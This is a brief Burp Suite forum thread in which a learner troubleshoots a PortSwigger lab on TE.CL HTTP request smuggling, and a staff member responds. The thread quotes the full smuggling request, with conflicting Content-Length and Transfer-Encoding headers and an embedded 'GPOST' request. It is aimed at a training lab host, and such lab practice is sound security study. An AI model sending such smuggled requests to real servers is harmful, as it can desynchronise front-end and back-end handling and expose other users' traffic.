Burp Suite User Forum

Create new post

HTTP request smuggling, basic TE.CL vulnerability

Ashish | Last updated: May 19, 2020 12:53PM UTC

i did the lab as mentioned in the solution but when i submit the request in repeater it says "bad request" followimg is the reuest i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 and also tried adding \r\n\r\n after the zero.

Michelle, PortSwigger Agent | Last updated: May 20, 2020 11:37AM UTC

We're taking a look into this, could you send us a copy of the request you used with the \r\n\r\n added, please?

Ashish | Last updated: May 20, 2020 01:02PM UTC

it worked today for me i just did it same way but without writing those \r\n\r\n after zero don't know what was the error,

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.